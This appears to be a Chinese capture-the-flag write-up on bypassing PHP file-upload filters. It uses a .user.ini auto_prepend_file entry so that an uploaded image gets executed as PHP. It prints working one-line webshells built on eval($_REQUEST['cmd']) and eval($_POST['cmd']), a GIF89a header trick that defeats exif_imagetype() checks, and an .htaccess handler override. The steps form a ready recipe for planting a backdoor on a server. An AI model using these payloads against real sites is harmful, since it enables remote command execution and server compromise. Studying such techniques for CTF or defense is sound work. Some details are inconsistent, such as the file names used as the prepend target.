前提知识
php.ini、.user.ini、.htaccess
php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件。这里我们可以把.user.ini看作是用户自定义的一个php.ini,并且可以利用这个文件来构造后门和隐藏后门。
.user.ini比.htaccess用的更广,不管是nginx/apache/IIS,只要是以CGI/FastCGI模式运行的php都可以用这个方法。
1. 举个例子理解.user.ini作用: 2. /*这是.user.ini的两个配置 3. auto_prepend_file是在文件前插入 4. auto_append_file是在文件最后才插入*/ 5. 6. 1.在user.ini 中设置 7. auto_prepend_file=b.gif 8. 9. 2.在b.gif中设置 一句话木马 10. 11. 3.还有个php文件 如:前面做题中的index.php 12. 13. 如果这三个条件在同一个目录下面,这里就相当于 在index.php中写了include "b.gif" , 可以进行文件包含,导致的后果是:当我们对目录中的index.php进行访问的时候,会调用.usre.ini 中的文件把b.gif文件以php的形式进行读取
局限
在.user.ini中使用这条配置也说了是在同目录下的其他.php文件中包含配置中所指定的文件,也就是说需要该目录下存在.php 文件,通常在文件上传中,一般是专门有一个目录用来存在图片,可能小概率会存在.php文件。 但是有时可以使用 ../ 来将文件上传到其他目录,达到一个利用的效果。
解题步骤
上传一句话后门,回显<? in contents :
更改为
<script language="php">eval($_REQUEST['cmd']);</script>
绕过exif_imagetype() 函数
exif_imagetype()函数会读取图像的第一个字节,并检查其签名,如果发现了恰当的签名则会返回相应的常量,否则返回false ,我们可以在一句话木马前面加上一个GIF图片文件头前缀GIF89a进行绕过
1. GIF89a 2. <script language='php'>eval($_REQUEST['cmd']);</script>
.htaccess 文件
1. <FilesMatch> 2. SetHandler application/x-httpd-php 3. </FilesMatch>
.htaccess 文件可以把后缀为其他类型的图片解析成php文件,使我们上传的图片内容可以被解析,但是这里对 .htaccess文件也做了限制,所以我们就需要想其他的办法。
构造一个.user.ini文件
1. GIF89a 2. auto_prepend_file=a.jpg
然后构造一个a.jpg
1. GIF89a 2. <script language='php'> @eval($_POST['cmd']);</script>
然后将两个文件分别上传到服务器上
文件夹下面有三个文件,一个是 .user.ini, 一个是 a.jpg ,还有一个 index.php
1. //上传.user.ini文件,条件如下: 2. 3. (1)服务器脚本语言为PHP 4. (2)对应目录下面有可执行的php文件 //index.php 5. (3)服务器使用CGI/FastCGI模式 6. 7. 8. 上传的文件内容 9. GIF89a //auto_prepend_file是在文件前插入,而auto_append_file是在文件最后才插入。 10. auto_prepend_file=b.gif //需要注意上穿的文件名字要和设定的名字一样,这里可以设定多个
